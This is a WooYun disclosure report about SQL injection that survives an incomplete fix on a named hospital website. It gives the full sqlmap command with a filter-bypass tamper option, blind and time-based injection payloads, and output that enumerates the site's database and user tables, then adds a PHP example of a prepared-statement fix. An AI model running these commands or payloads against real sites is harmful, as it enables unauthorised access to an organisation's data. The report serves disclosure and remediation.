
SQL injection on a United Family Healthcare (和睦家) site persists after an improper fix

2016-01-05 13:00

URL:http://life.ufh.com.cn/guidelist.php?g_id=10

I reported this before, and United Family Healthcare replied that the vulnerability had been fixed.

Vendor response:

This is the hospital's official website; defacement would damage the hospital's reputation.

Latest status:

2015-12-21: The vendor has fixed this vulnerability

WooYun: SQL injection on a United Family Hospital site

Testing shows they most likely just added a soft WAF; adding a time delay allows the injection to continue.

C:\Python27\SqlMap>Sqlmap.py -u http://life.ufh.com.cn/guidelist.php?g_id=10 --time-sec=20 --tamper=space2comment

sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: g_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g_id=10 AND 8003=8003

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)
---
back-end DBMS: MySQL 5.0.12

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: g_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g_id=10 AND 8003=8003

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)
---
back-end DBMS: MySQL 5.0.12
current database: 'life_wp'

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: g_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g_id=10 AND 8003=8003

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)
---
back-end DBMS: MySQL 5.0.12
Database: life_wp
[28 tables]
+-----------------------+
| wp_activity           |
| wp_apphos             |
| wp_apply              |
| wp_channel            |
| wp_commentmeta        |
| wp_comments           |
| wp_forgetpwd          |
| wp_guide              |
| wp_home               |
| wp_hospital           |
| wp_links              |
| wp_member             |
| wp_options            |
| wp_order              |
| wp_pack               |
| wp_pactivity          |
| wp_personnel          |
| wp_postmeta           |
| wp_posts              |
| wp_prize              |
| wp_sign               |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
| wp_wechat             |
| wp_winning            |
+-----------------------+

Proof of vulnerability:

As above.

Fix:

Filter the input.
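As an added example (not code from the report or from the site), the kind of rewrite that closes this hole regardless of what a keyword filter in front of it catches: the real guidelist.php is not shown, so the query, the integer column g_id on the wp_guide table, and the connection details are assumptions.

```php
<?php
// Added example, not the site's code. Assumes a MySQL table wp_guide (it appears in
// the dump above) with a hypothetical integer column g_id; DSN and credentials are
// placeholders.

// Vulnerable pattern: the query-string value is concatenated into SQL, so a value such
// as "10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)" is executed as SQL. A keyword
// blacklist ("soft WAF") in front of this does not change what the database sees once
// a variant (comments instead of spaces, a delay) slips past it.
function fetch_guide_vulnerable(mysqli $db, string $g_id): ?array {
    $sql = "SELECT * FROM wp_guide WHERE g_id = " . $g_id;
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Fixed pattern: validate the parameter as a positive integer, then bind it as a typed
// parameter of a prepared statement. The value never becomes SQL text, so boolean
// expressions, comments or SLEEP() inside it cannot alter the statement.
function fetch_guide_safe(mysqli $db, string $raw_g_id): ?array {
    $g_id = filter_var($raw_g_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($g_id === false) {
        return null;                       // "10 AND 8003=8003" is rejected here
    }
    $stmt = $db->prepare("SELECT * FROM wp_guide WHERE g_id = ?");
    $stmt->bind_param('i', $g_id);         // 'i' binds as an integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Placeholder connection details; the database name life_wp is the one shown in the dump.
$db = new mysqli('localhost', 'app_user', 'app_password', 'life_wp');
$guide = fetch_guide_safe($db, $_GET['g_id'] ?? '');
if ($guide === null) {
    http_response_code(404);
    exit;
}
```

The rejected-input branch also gives the web server log a clean 4xx to alert on, which a filter that silently rewrites the value does not.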


Source: www.wooyun.org/bugs/wooyun-2016-0163866
